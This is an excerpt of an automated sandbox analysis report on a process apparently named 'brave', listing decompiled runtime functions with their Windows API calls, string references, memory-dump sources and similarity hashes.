0x7ff715ba2bb5
0x7ff715ba2bbc
0x7ff715ba2bc2
0x7ff715ba2bca
0x7ff715ba2bd3
0x7ff715ba2bdc
0x7ff715ba2be2
0x7ff715ba2bef
0x7ff715ba2bf5
0x7ff715ba2bfc
0x7ff715ba2c02
0x7ff715ba2c0a
0x7ff715ba2c13
0x7ff715ba2c18
0x7ff715ba2c1e
0x7ff715ba2c23
0x7ff715ba2c2f
0x7ff715ba2c33
0x7ff715ba2c3f
0x7ff715ba2c46
0x7ff715ba2c52
0x7ff715ba2c56
0x7ff715ba2c62
0x7ff715ba2c69
0x7ff715ba2c73
0x7ff715ba2c80
0x7ff715ba2c87
0x7ff715ba2c8c
0x7ff715ba2c99
0x7ff715ba2c9e
0x7ff715ba2ca8
0x7ff715ba2cb2
0x7ff715ba2cb7
0x7ff715ba2cbf
0x7ff715ba2cc8
0x7ff715ba2ccd
0x7ff715ba2cd3
0x7ff715ba2cdc
0x7ff715ba2ce0
0x7ff715ba2cea
0x7ff715ba2cf0
0x7ff715ba2d01
0x7ff715ba2d0a
0x7ff715ba2d10
0x7ff715ba2d15
0x7ff715ba2d1a
0x7ff715ba2d23
0x7ff715ba2d2d
0x7ff715ba2d2f

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF715BA22CD
_ultoa.MSVCRT ref: 00007FF715BA22E0
OutputDebugStringA.KERNEL32 ref: 00007FF715BA2327
abort.MSVCRT ref: 00007FF715BA232D

Strings

thread , xrefs: 00007FF715BA225E
p spin_k, xrefs: 00007FF715BA2240
Error cl, xrefs: 00007FF715BA2227
eaning u, xrefs: 00007FF715BA2231
eys for , xrefs: 00007FF715BA224F

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CurrentDebugOutputStringThread_ultoaabort
String ID: Error cl$eaning u$eys for $p spin_k$thread
API String ID: 4191895893-3545615192
Opcode ID: 5e02075398575467d757778500d00e02b97ceec7ff2355a5d38304a33f0ea4e3
Instruction ID: d51464c015563aebdd1be9f6c8550f5d2375b2857949770d501e1de0bf640286
Opcode Fuzzy Hash: 5e02075398575467d757778500d00e02b97ceec7ff2355a5d38304a33f0ea4e3
Instruction Fuzzy Hash: C9214F7261CB8086E7759B14F05432AF6E2F785B54F908134E2CD4BBA8DF7DD4488B11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9F750 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF715B9F761
WaitForSingleObject.KERNEL32 ref: 00007FF715B9F772
FindAtomA.KERNEL32 ref: 00007FF715B9F7DF
ReleaseMutex.KERNEL32 ref: 00007FF715B9F7ED
CloseHandle.KERNEL32 ref: 00007FF715B9F7F6
CloseHandle.KERNEL32 ref: 00007FF715B9F817

Strings

failed to to lock cleanup mutex, xrefs: 00007FF715B9F808

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
String ID: failed to to lock cleanup mutex
API String ID: 3776795807-674698732
Opcode ID: 71f342f9f933a52b181f13a2de0319036eade7889627a245c740d797601e7c04
Instruction ID: 5cd7ed458e45b6dc4f1c011024d6a94a05810d5f478633a28f7d8cd35d2564dc
Opcode Fuzzy Hash: 71f342f9f933a52b181f13a2de0319036eade7889627a245c740d797601e7c04
Instruction Fuzzy Hash: 192130A9E15E0281EE6DBB619954175A2A1BF44FB5BC49435D81E4A3B0EF2CE48DC320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB1DD0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF715BB1DE1
GetProcAddress.KERNEL32 ref: 00007FF715BB1DF8
LoadLibraryW.KERNEL32 ref: 00007FF715BB1E1F
GetProcAddress.KERNEL32 ref: 00007FF715BB1E2F

Strings

rand_s, xrefs: 00007FF715BB1DEE
advapi32.dll, xrefs: 00007FF715BB1E18
msvcrt.dll, xrefs: 00007FF715BB1DDA
SystemFunction036, xrefs: 00007FF715BB1E25

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 4f62b90e336705d4da321a7fa2fb84c276bc2db0b258b9504fce3f42ee99db90
Instruction ID: 7f99cfcfc43d37e7f0665598540c6fde95d7941c6fd3247b6b4e06ba8992de16
Opcode Fuzzy Hash: 4f62b90e336705d4da321a7fa2fb84c276bc2db0b258b9504fce3f42ee99db90
Instruction Fuzzy Hash: 4CF0E224E1AE03D1EA1DAB61FD51076A265BF08BA0FC40535D84D8A274EF2CA55CC724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBDEF0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF715BBDF96
memcpy.MSVCRT ref: 00007FF715BBDFC1
memcpy.MSVCRT ref: 00007FF715BBE030
memcpy.MSVCRT ref: 00007FF715BBE06E
memcpy.MSVCRT ref: 00007FF715BBE0BF

Strings

basic_string::_M_replace, xrefs: 00007FF715BBE1DE

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: 83352c911b5e7a670d2c16afee725c69e32d097fda13c06022162402ec47247e
Instruction ID: 002e0dcd3f6e064c077861f4fd8ebe77fca92bf163884c96a73f02ebaf809e1f
Opcode Fuzzy Hash: 83352c911b5e7a670d2c16afee725c69e32d097fda13c06022162402ec47247e
Instruction Fuzzy Hash: 1071D322A0DE5695E938EF11C4041B9E754AB04FA4FE84532EA1E177F0DFBCE649C329

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBAE20 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF715BBAEC5
memcpy.MSVCRT ref: 00007FF715BBAEF0
memcpy.MSVCRT ref: 00007FF715BBAF59
memcpy.MSVCRT ref: 00007FF715BBAF8D
memcpy.MSVCRT ref: 00007FF715BBAFD9

Strings

basic_string::_M_replace, xrefs: 00007FF715BBB0E1

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: 6e4ccbe5bf110cb7a92f3fabf76553f9e581279dc44f1e42f5d797bc024edc43
Instruction ID: f66026f2e6818ea6735a030a7485e36cfb3cf67c3516a3859f41a97aadd9a860
Opcode Fuzzy Hash: 6e4ccbe5bf110cb7a92f3fabf76553f9e581279dc44f1e42f5d797bc024edc43
Instruction Fuzzy Hash: C7611922E0DED645F939BA1584041B8E654AB12FE0FD84132CA5D077E2DFEED649C334

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA5AE0 Relevance: 13.7, APIs: 9, Instructions: 182
threadinjectionsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00007FF77FF715BA5AE0(void* __ecx, void* __edi, void* __rax, void* __rcx) {
				char _v1272;
				signed int _t18;
				void* _t39;
				void* _t40;
				void* _t42;
				intOrPtr _t50;
				void* _t51;
				intOrPtr* _t52;

				_t39 = __rax;
				_t51 = __rcx;
				E00007FF77FF715BA3190(__edi, __rcx);
				_t42 = _t39;
				if (_t39 == 0) goto 0x15ba5bce;
				_t40 =  *((intOrPtr*)(_t39 + 0x28)) - 1;
				if (_t40 - 0xfffffffd > 0) goto 0x15ba5bce;
				if (GetHandleInformation(??, ??) == 0) goto 0x15ba5bce;
				_t4 = _t42 + 0x38; // 0x38
				E00007FF77FF715BA04E0(_t4);
				E00007FF77FF715BA2D40(__ecx,  &_v1272);
				if (_t40 == 0) goto 0x15ba5d20;
				_t18 =  *(_t42 + 0x40) & 0x000000ff;
				if (_t51 ==  *((intOrPtr*)(_t40 + 0x1d8))) goto 0x15ba5ca0;
				if (( *(_t42 + 0x44) & 0x00000003) == 3) goto 0x15ba5be8;
				if ((_t18 & 0x00000003) != 0) goto 0x15ba5bc0;
				_t52 =  *0x15e46920; // 0x7ff715e51400
				_t50 =  *_t52;
				 *(_t42 + 0x40) = _t18 & 0xfffffffc | 0x00000001;
				if (_t50 == 0) goto 0x15ba5d50;
				if ( *((long long*)(_t50 + 0x18)) == 0) goto 0x15ba5d30;
				asm("lock add dword [eax], 0x1");
				if ( *((intOrPtr*)(_t42 + 0x30)) == 0) goto 0x15ba5ba8;
				SetEvent(??);
				E00007FF77FF715BA0800(_t4);
				return 0;
			}

0x7ff715ba5ae0
0x7ff715ba5aed
0x7ff715ba5af0
0x7ff715ba5af5
0x7ff715ba5afb
0x7ff715ba5b05
0x7ff715ba5b0d
0x7ff715ba5b23
0x7ff715ba5b29
0x7ff715ba5b30
0x7ff715ba5b35
0x7ff715ba5b3d
0x7ff715ba5b4a
0x7ff715ba5b51
0x7ff715ba5b60
0x7ff715ba5b68
0x7ff715ba5b6a
0x7ff715ba5b77
0x7ff715ba5b7a
0x7ff715ba5b80
0x7ff715ba5b8b
0x7ff715ba5b95
0x7ff715ba5ba0
0x7ff715ba5ba2
0x7ff715ba5bab
0x7ff715ba5bbf

APIs

GetHandleInformation.KERNEL32 ref: 00007FF715BA5B1B

Part of subcall function 00007FF715BA2D40: TlsGetValue.KERNEL32 ref: 00007FF715BA2DA0

SetEvent.KERNEL32 ref: 00007FF715BA5BA2
SuspendThread.KERNEL32 ref: 00007FF715BA5BFC
WaitForSingleObject.KERNEL32 ref: 00007FF715BA5C08
GetThreadContext.KERNEL32 ref: 00007FF715BA5C1C
SetThreadContext.KERNEL32 ref: 00007FF715BA5C38
SetEvent.KERNEL32 ref: 00007FF715BA5C7E
ResumeThread.KERNEL32 ref: 00007FF715BA5C90
SetEvent.KERNEL32 ref: 00007FF715BA5CE3

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Thread$Event$Context$HandleInformationObjectResumeSingleSuspendValueWait
String ID:
API String ID: 2335333592-0
Opcode ID: c0454334065818ad910fe9271c82020997dc8f7e4f5c5ab4ac494b7568ff68ad
Instruction ID: 43101672392d624b7367605d32130265a65fca1706a7e6edbbc2baabb3e9884f
Opcode Fuzzy Hash: c0454334065818ad910fe9271c82020997dc8f7e4f5c5ab4ac494b7568ff68ad
Instruction Fuzzy Hash: BF816762E09E4281EE7EAB219404379A7A1EF55FB4FC44131DA5D0B2E5DF2CE98C8360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB7980 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF77FF715BB7980(intOrPtr* __rcx, void* __rdx) {
				void* _t13;

				_t13 = __rdx;
				if (__rdx - 0xfffffff9 > 0) goto 0x15bb79ef;
				E00007FF77FF715BB8580(__rcx, __rdx,  *((intOrPtr*)( *__rcx - 0x18)), __rdx);
				if (_t13 == 0) goto 0x15bb79cc;
				if (_t13 == 1) goto 0x15bb79e0;
				return memset(??, ??, ??);
			}

0x7ff715bb7995
0x7ff715bb79a5
0x7ff715bb79ac
0x7ff715bb79b4
0x7ff715bb79be
0x7ff715bb79d7

APIs

memset.MSVCRT ref: 00007FF715BB79C7
memcpy.MSVCRT ref: 00007FF715BB7BB9

Part of subcall function 00007FF715BB8580: memcpy.MSVCRT ref: 00007FF715BB85FB

Strings

basic_string::insert, xrefs: 00007FF715BB7CA3, 00007FF715BB7CB2
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BB7CB9
basic_string::_M_replace_aux, xrefs: 00007FF715BB79EF

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy$memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 438689982-1339558951
Opcode ID: 2aa7705d7efa051678438d68cb09cc562f26b0b831d3bb896a7316ff393a9a71
Instruction ID: b2b04eceb064ed6595992c3710d823ad379aee85a16a5f95fd10f85819b1bacc
Opcode Fuzzy Hash: 2aa7705d7efa051678438d68cb09cc562f26b0b831d3bb896a7316ff393a9a71
Instruction Fuzzy Hash: E9511552E09E9641EA397A6698100B8D7609F05FF0FDC4532DE1C177B2DFACE649C328

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA91C0 Relevance: 13.6, APIs: 9, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FF77FF715BA91C0(void* __esi, long long* __rcx, void* __rdx) {
				long long _v72;
				void* _t12;
				long long* _t28;
				intOrPtr _t47;

				_t28 = __rcx;
				if (__rcx == 0) goto 0x15ba9380;
				_t47 =  *((intOrPtr*)(__rcx));
				r13d = 0x16;
				if (_t47 == 0) goto 0x15ba92b4;
				if (_t47 == 0xffffffff) goto 0x15ba92d0;
				_t1 = _t47 + 0x98; // 0x98
				_t3 = _t47 + 0x70; // 0x70
				_v72 = _t1;
				r8d = 0xffffffff;
				_t12 = E00007FF77FF715BA9120(0,  *((intOrPtr*)(_t47 + 0xa8)), _t3);
				r13d = _t12;
				if (_t12 != 0) goto 0x15ba92b4;
				if (TryEnterCriticalSection(??) == 0) goto 0x15ba93c0;
				if ( *((intOrPtr*)(_t47 + 8)) -  *((intOrPtr*)(_t47 + 0x10)) > 0) goto 0x15ba9390;
				 *_t28 = 0;
				E00007FF77FF715BA8880(1,  *((intOrPtr*)(_t47 + 0xa8)), _t3, _t1);
				CloseHandle(??);
				CloseHandle(??);
				LeaveCriticalSection(??);
				DeleteCriticalSection(??);
				DeleteCriticalSection(??);
				DeleteCriticalSection(??);
				free(??);
				return r13d;
			}

0x7ff715ba91ce
0x7ff715ba91d4
0x7ff715ba91da
0x7ff715ba91dd
0x7ff715ba91e6
0x7ff715ba91f0
0x7ff715ba91f6
0x7ff715ba9206
0x7ff715ba920d
0x7ff715ba9215
0x7ff715ba921b
0x7ff715ba9220
0x7ff715ba9225
0x7ff715ba9243
0x7ff715ba9253
0x7ff715ba9259
0x7ff715ba926b
0x7ff715ba927f
0x7ff715ba9289
0x7ff715ba928e
0x7ff715ba929e
0x7ff715ba92a3
0x7ff715ba92aa
0x7ff715ba92af
0x7ff715ba92c5

APIs

Part of subcall function 00007FF715BA9120: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF715BA9749), ref: 00007FF715BA9146
Part of subcall function 00007FF715BA9120: LeaveCriticalSection.KERNEL32(?,00007FF715BA9749,?,?,?,?,?,?,?,?,?,?,?,00007FF715E51400,?), ref: 00007FF715BA916B

TryEnterCriticalSection.KERNEL32 ref: 00007FF715BA9233
CloseHandle.KERNEL32 ref: 00007FF715BA927F
CloseHandle.KERNEL32 ref: 00007FF715BA9289
LeaveCriticalSection.KERNEL32 ref: 00007FF715BA928E
DeleteCriticalSection.KERNEL32 ref: 00007FF715BA929E
DeleteCriticalSection.KERNEL32 ref: 00007FF715BA92A3
DeleteCriticalSection.KERNEL32 ref: 00007FF715BA92AA
free.MSVCRT ref: 00007FF715BA92AF
LeaveCriticalSection.KERNEL32 ref: 00007FF715BA93B1

Part of subcall function 00007FF715BA8880: EnterCriticalSection.KERNEL32 ref: 00007FF715BA8898
Part of subcall function 00007FF715BA8880: ReleaseSemaphore.KERNEL32 ref: 00007FF715BA88C6
Part of subcall function 00007FF715BA8880: LeaveCriticalSection.KERNEL32 ref: 00007FF715BA88D3

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CriticalSection$Leave$DeleteEnter$CloseHandle$ReleaseSemaphorefree
String ID:
API String ID: 897415695-0
Opcode ID: a0b6630a7d97047e0030e229e683856c82cc15d2976108efe7bffb770ea2e6fd
Instruction ID: 9e7c13957d75417dd4e340fe873d70808e586a52fdcd594a9b10e41ea8852050
Opcode Fuzzy Hash: a0b6630a7d97047e0030e229e683856c82cc15d2976108efe7bffb770ea2e6fd
Instruction Fuzzy Hash: F3517E25A08E4280EA3ABB26D8547BAA2A0BF44FB4F844535DD5D473E1DF3CA449E321

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA8BA0 Relevance: 13.6, APIs: 9, Instructions: 81COMMON

Download Yara Rule

APIs

calloc.MSVCRT(?,00007FF715E51400,00000000,00007FF715BA7B97,?,?,?,00007FF715BA7CC5,?,?,?,?,00007FF715BA7E65,?,00007FF715E51400), ref: 00007FF715BA8BCC
CreateSemaphoreA.KERNEL32 ref: 00007FF715BA8C0C
CreateSemaphoreA.KERNEL32 ref: 00007FF715BA8C23
InitializeCriticalSection.KERNEL32(?,00007FF715E51400,00000000,00007FF715BA7B97,?,?,?,00007FF715BA7CC5,?,?,?,?,00007FF715BA7E65,?,00007FF715E51400), ref: 00007FF715BA8C4B
InitializeCriticalSection.KERNEL32(?,00007FF715E51400,00000000,00007FF715BA7B97,?,?,?,00007FF715BA7CC5,?,?,?,?,00007FF715BA7E65,?,00007FF715E51400), ref: 00007FF715BA8C52
InitializeCriticalSection.KERNEL32(?,00007FF715E51400,00000000,00007FF715BA7B97,?,?,?,00007FF715BA7CC5,?,?,?,?,00007FF715BA7E65,?,00007FF715E51400), ref: 00007FF715BA8C59

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphore$calloc
String ID:
API String ID: 2075313795-0
Opcode ID: 7c892f574ebb44d14683540b960821f729198a1c4daf112854c0d4a023215e6b
Instruction ID: ce8c7dbf5da75f1801c1cde31a5659cd257c0a459d66405441828400fbbb25af
Opcode Fuzzy Hash: 7c892f574ebb44d14683540b960821f729198a1c4daf112854c0d4a023215e6b
Instruction Fuzzy Hash: 8B21D532B16B1285FB7AEB25E418B7A6694EF44BA4F844035EE1D077D0EF3C9489C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9E650 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00007FF77FF715B9E650(void* __ebx, long __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
				void* _v32;
				intOrPtr _v108;
				void* _v144;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t26;
				intOrPtr _t42;
				long long _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				long long _t47;
